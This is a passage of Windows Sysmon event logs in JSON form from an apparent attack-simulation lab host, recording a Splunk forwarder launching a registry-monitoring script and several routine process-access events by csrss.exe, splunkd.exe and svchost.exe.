{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2180,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.879\r\nProcessGuid: {41C8662E-1F78-5F25-0000-0010BA030400}\r\nProcessId: 3776\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinRegMon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.879","ProcessGuid":"{41C8662E-1F78-5F25-0000-0010BA030400}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinRegMon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2181,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.877\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3880\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1F78-5F25-0000-0010BA030400}\r\nTargetProcessId: 3776\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.877","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3880","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1F78-5F25-0000-0010BA030400}","TargetProcessId":"3776","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2182,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.877\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F78-5F25-0000-0010BA030400}\r\nTargetProcessId: 3776\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.877","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F78-5F25-0000-0010BA030400}","TargetProcessId":"3776","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2183,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.877\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.877","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2184,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.877\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.877","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2185,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.877\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.877","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2186,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.877\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.877","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2187,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.877\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.877","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2188,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.877\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 